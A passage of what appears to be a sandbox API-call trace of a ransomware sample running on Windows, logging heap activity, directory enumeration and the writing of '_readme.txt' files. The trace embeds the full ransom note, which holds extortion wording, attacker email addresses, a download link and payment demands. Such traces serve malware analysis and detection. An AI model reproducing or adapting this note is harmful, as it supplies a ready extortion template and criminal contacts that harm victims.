lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.669] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.671] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0165.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.671] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.671] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.671] PathFindFileNameW (pszPath="") returned="" [0165.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.671] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.671] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.671] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.672] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.672] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0165.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.672] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0165.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.673] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.673] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.673] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.673] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.673] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.673] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.673] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.673] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.674] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: 